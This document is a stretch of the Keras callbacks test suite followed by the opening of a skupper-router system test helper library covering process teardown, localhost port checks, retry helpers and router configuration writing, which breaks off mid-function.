np.random.seed(1337)
filepath = str(tmpdir / 'checkpoint.h5')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.isfile(filepath.format(epoch=2))
assert os.path.isfile(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not tmpdir.listdir()
@keras_test
def test_EarlyStopping():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
@keras_test
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
@keras_test
def test_EarlyStopping_patience():
class DummyModel(object):
def __init__(self):
self.stop_training = False
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040, 0.1019]
# Should stop after epoch 3, as the loss has not improved after patience=2 epochs.
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
assert epochs_trained == 3
@keras_test
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
@keras_test
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
@keras_test
def test_CSVLogger(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'log.tsv')
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
import re
with open(filepath) as csvfile:
output = " ".join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=0), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
inp = Input((input_dim,))
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=inp, outputs=output)
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data should raise ValueError if histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit(X_train, y_train, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=1), epochs=3)
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator without validation data should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
# fit generator with validation data generator should raise ValueError if
# histogram_freq > 0
with pytest.raises(ValueError) as raised_exception:
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=data_generator(False),
validation_steps=1,
callbacks=callbacks_factory(histogram_freq=1))
assert 'validation_data must be provided' in str(raised_exception.value)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_multi_input_output(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2,
[y_train[i * batch_size: (i + 1) * batch_size]] * 2)
else:
yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2,
[y_test[i * batch_size: (i + 1) * batch_size]] * 2)
i += 1
i = i % max_batch_index
inp1 = Input((input_dim,))
inp2 = Input((input_dim,))
inp = add([inp1, inp2])
hidden = Dense(num_hidden, activation='relu')(inp)
hidden = Dropout(0.1)(hidden)
output1 = Dense(num_classes, activation='softmax')(hidden)
output2 = Dense(num_classes, activation='softmax')(hidden)
model = Model(inputs=[inp1, inp2], outputs=[output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)]
# fit without validation data
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=([X_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires TensorFlow backend')
def test_TensorBoard_convnet(tmpdir):
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
input_shape = (16, 16, 3)
(x_train, y_train), (x_test, y_test) = get_test_data(num_train=500,
num_test=200,
input_shape=input_shape,
classification=True,
num_classes=num_classes)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = Sequential([
Conv2D(filters=8, kernel_size=3,
activation='relu',
input_shape=input_shape),
MaxPooling2D(pool_size=2),
Conv2D(filters=4, kernel_size=(3, 3),
activation='relu', padding='same'),
GlobalAveragePooling2D(),
Dense(num_classes, activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
batch_size=16)
cbks = [tsb]
model.summary()
history = model.fit(x_train, y_train, epochs=2, batch_size=16,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
@keras_test
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit_generator(data_generator(True), len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
@keras_test
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires TensorFlow backend")
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
if __name__ == '__main__':
pytest.main([__file__])
|
system_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""System test library, provides tools for tests that start multiple processes,
with special support for skupper-router processes.
Features:
- Create separate directories for each test.
- Save logs, sub-process output, core files etc.
- Automated clean-up after tests: kill sub-processes etc.
- Tools to manipulate router configuration files.
- Sundry other tools.
"""
import fcntl
import pathlib
from typing import Callable, TextIO
import errno
import logging
import sys
import time
from typing import List, Optional, Tuple
import __main__
import os
import random
import re
import shutil
import socket
import subprocess
from copy import copy
from datetime import datetime
from subprocess import PIPE, STDOUT
import queue as Queue
from threading import Thread
from threading import Event
import json
import uuid
import unittest
import proton
import proton.utils
from proton import Message
from proton import Delivery
from proton.handlers import MessagingHandler
from proton.reactor import AtLeastOnce, Container
from proton.reactor import AtMostOnce
from skupper_router.management.client import Node
from skupper_router.management.error import NotFoundStatus
# Optional modules
MISSING_MODULES = []
try:
import qpidtoollibs
except ImportError as err:
qpidtoollibs = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
try:
import qpid_messaging as qm
except ImportError as err:
qm = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
def find_exe(program):
"""Find an executable in the system PATH"""
def is_exe(fpath):
"""True if fpath is executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
mydir = os.path.split(program)[0]
if mydir:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
# The directory where this module lives. Used to locate static configuration files etc.
DIR = os.path.dirname(__file__)
def _check_requirements():
"""If requirements are missing, return a message, else return empty string."""
missing = MISSING_MODULES
required_exes = ['skrouterd']
missing += ["No exectuable %s" % e for e in required_exes if not find_exe(e)]
if missing:
return "%s: %s" % (__name__, ", ".join(missing))
MISSING_REQUIREMENTS = _check_requirements()
def retry_delay(deadline, delay, max_delay):
"""For internal use in retry. Sleep as required
and return the new delay or None if retry should time out"""
remaining = deadline - time.time()
if remaining <= 0:
return None
time.sleep(min(delay, remaining))
return min(delay * 2, max_delay)
# Valgrind significantly slows down the response time of the router, so use a
# long default timeout
TIMEOUT = float(os.environ.get("QPID_SYSTEM_TEST_TIMEOUT", 60))
def retry(function: Callable[[], bool], timeout: float = TIMEOUT, delay: float = .001, max_delay: float = 1):
"""Call function until it returns a true value or timeout expires.
Double the delay for each retry up to max_delay.
Returns what function returns or None if timeout expires.
"""
deadline = time.time() + timeout
while True:
ret = function()
if ret:
return ret
else:
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
return None
def retry_exception(function, timeout=TIMEOUT, delay=.001, max_delay=1, exception_test=None):
"""Call function until it returns without exception or timeout expires.
Double the delay for each retry up to max_delay.
Calls exception_test with any exception raised by function, exception_test
may itself raise an exception to terminate the retry.
Returns what function returns if it succeeds before timeout.
Raises last exception raised by function on timeout.
"""
deadline = time.time() + timeout
while True:
try:
return function()
except Exception as e: # pylint: disable=broad-except
if exception_test:
exception_test(e)
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
raise
def get_local_host_socket(socket_address_family='IPv4'):
if socket_address_family == 'IPv4':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
elif socket_address_family == 'IPv6':
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
host = '::1'
return s, host
def check_port_refuses_connection(port, socket_address_family='IPv4'):
"""Return true if connecting to host:port gives 'connection refused'."""
s, host = get_local_host_socket(socket_address_family)
try:
s.connect((host, port))
except OSError as e:
return e.errno == errno.ECONNREFUSED
finally:
s.close()
return False
def check_port_permits_binding(port, socket_address_family='IPv4'):
"""Return true if binding to the port succeeds."""
s, _ = get_local_host_socket(socket_address_family)
host = ""
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # so that followup binders are not blocked
s.bind((host, port))
except OSError:
return False
finally:
s.close()
return True
def is_port_available(port, socket_address_family='IPv4'):
"""Return true if a new server will be able to bind to the port."""
return (check_port_refuses_connection(port, socket_address_family)
and check_port_permits_binding(port, socket_address_family))
def wait_port(port, socket_address_family='IPv4', **retry_kwargs):
"""Wait up to timeout for port (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
def check(e):
"""Only retry on connection refused"""
if not isinstance(e, socket.error) or not e.errno == errno.ECONNREFUSED:
raise
host = None
def connect():
# macOS gives EINVAL for all connection attempts after a ECONNREFUSED
# man 3 connect: "If connect() fails, the state of the socket is unspecified. [...]"
s, host = get_local_host_socket(socket_address_family)
try:
s.connect((host, port))
finally:
s.close()
try:
retry_exception(connect, exception_test=check, **retry_kwargs)
except Exception as e:
raise Exception("wait_port timeout on host %s port %s: %s" % (host, port, e))
def wait_ports(ports, **retry_kwargs):
"""Wait up to timeout for all ports (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
for port, socket_address_family in ports.items():
wait_port(port=port, socket_address_family=socket_address_family, **retry_kwargs)
def message(**properties):
"""Convenience to create a proton.Message with properties set"""
m = Message()
for name, value in properties.items():
getattr(m, name) # Raise exception if not a valid message attribute.
setattr(m, name, value)
return m
def skip_test_in_ci(environment_var):
env_var = os.environ.get(environment_var)
if env_var is not None:
if env_var.lower() in ['true', '1', 't', 'y', 'yes']:
return True
return False
class Process(subprocess.Popen):
"""
Popen that can be torn down at the end of a TestCase and stores its output.
"""
# Expected states of a Process at teardown
RUNNING = -1 # Still running
EXIT_OK = 0 # Exit status 0
EXIT_FAIL = 1 # Exit status 1
unique_id = 0
@classmethod
def unique(cls, name):
cls.unique_id += 1
return "%s-%s" % (name, cls.unique_id)
def __init__(self, args, name=None, expect=EXIT_OK, **kwargs):
"""
Takes same arguments as subprocess.Popen. Some additional/special args:
@param expect: Raise error if process status not as expected at end of test:
L{RUNNING} - expect still running.
L{EXIT_OK} - expect process to have terminated with 0 exit status.
L{EXIT_FAIL} - expect process to have terminated with exit status 1.
integer - expected return code
@keyword stdout: Defaults to the file name+".out"
@keyword stderr: Defaults to be the same as stdout
"""
self.name = name or os.path.basename(args[0])
self.args = args
self.expect = expect
self.outdir = os.getcwd()
self.outfile = os.path.abspath(self.unique(self.name))
self.torndown = False
with open(self.outfile + '.out', 'w') as out:
kwargs.setdefault('stdout', out)
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
super(Process, self).__init__(args, **kwargs)
with open(self.outfile + '.cmd', 'w') as f:
f.write("%s\npid=%s\n" % (' '.join(args), self.pid))
except Exception as e:
raise Exception("subprocess.Popen(%s, %s) failed: %s: %s" %
(args, kwargs, type(e).__name__, e))
def assert_running(self):
"""Assert that the process is still running"""
assert self.poll() is None, "%s: exited" % ' '.join(self.args)
def teardown(self):
"""Check process status and stop the process if necessary"""
if self.torndown:
return
self.torndown = True
def error(msg):
with open(self.outfile + '.out') as f:
raise RuntimeError("Process %s error: %s\n%s\n%s\n>>>>\n%s<<<<" % (
self.pid, msg, ' '.join(self.args),
self.outfile + '.cmd', f.read()))
status = self.poll()
if status is None: # Still running
self.terminate()
if self.expect is not None and self.expect != Process.RUNNING:
error("still running")
self.expect = 0 # Expect clean exit after terminate
status = self.wait()
if self.expect is not None and self.expect != status:
error("exit code %s, expected %s" % (status, self.expect))
class Config:
"""Base class for configuration objects that provide a convenient
way to create content for configuration files."""
def write(self, name, suffix=".conf"):
"""Write the config object to file name.suffix. Returns name.suffix."""
name = name + suffix
with open(name, 'w') as f:
f.write(str(self))
return name
class HttpServer(Process):
def __init__(self, args, name=None, expect=Process.RUNNING):
super(HttpServer, self).__init__(args, name=name, expect=expect)
class Http2Server(HttpServer):
"""A HTTP2 Server that will respond to requests made via the router."""
def __init__(self, name=None, listen_port=None, wait=True,
perform_teardown=True, cl_args=None,
server_file=None,
expect=Process.RUNNING):
self.name = name
self.listen_port = listen_port
self.ports_family = {self.listen_port: 'IPv4'}
self.cl_args = cl_args
self.perform_teardown = perform_teardown
self.server_file = server_file
self._wait_ready = False
self.args = [sys.executable, os.path.join(os.path.dirname(os.path.abspath(__file__)), self.server_file)]
if self.cl_args:
self.args += self.cl_args
super(Http2Server, self).__init__(self.args, name=name, expect=expect)
if wait:
self.wait_ready()
def wait_ready(self, **retry_kwargs):
"""
Wait for ports to be ready
"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
class Qdrouterd(Process):
"""Run a Qpid Dispatch Router Daemon"""
class Config(list, Config): # type: ignore[misc] # Cannot resolve name "Config" (possible cyclic definition) # mypy#10958
"""
A router configuration.
The Config class is a list of tuples in the following format:
[ ('section-name', {attribute-map}), ...]
where attribute-map is a dictionary of key+value pairs. Key is an
attribute name (string), value can be any of [scalar | string | dict]
When written to a configuration file to be loaded by the router:
o) there is no ":' between the section-name and the opening brace
o) attribute keys are separated by a ":" from their values
o) attribute values that are scalar or string follow the ":" on the
same line.
o) attribute values do not have trailing commas
o) The section-name and attribute keywords are written
without enclosing quotes
o) string type attribute values are not enclosed in quotes
o) attribute values of type dict are written in their JSON representation.
Fills in some default values automatically, see Qdrouterd.DEFAULTS
"""
DEFAULTS = {
'listener': {'host': '0.0.0.0', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120',
'authenticatePeer': 'no', 'role': 'normal'},
'connector': {'host': '127.0.0.1', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120'},
'router': {'mode': 'standalone', 'id': 'QDR'}
}
def sections(self, name):
"""Return list of sections named name"""
return [p for n, p in self if n == name]
@property
def router_id(self): return self.sections("router")[0]["id"]
def defaults(self):
"""Fill in default values in gconfiguration"""
for name, props in self:
if name in Qdrouterd.Config.DEFAULTS:
for n, p in Qdrouterd.Config.DEFAULTS[name].items():
props.setdefault(n, p)
def __str__(self):
"""Generate config file content. Calls default() first."""
def tabs(level):
if level:
return " " * level
return ""
def value(item, level):
if isinstance(item, dict):
result = "{\n"
result += "".join(["%s%s: %s,\n" % (tabs(level + 1),
json.dumps(k),
json.dumps(v))
for k, v in item.items()])
result += "%s}" % tabs(level)
return result
return "%s" % item
def attributes(e, level):
assert(isinstance(e, dict))
# k = attribute name
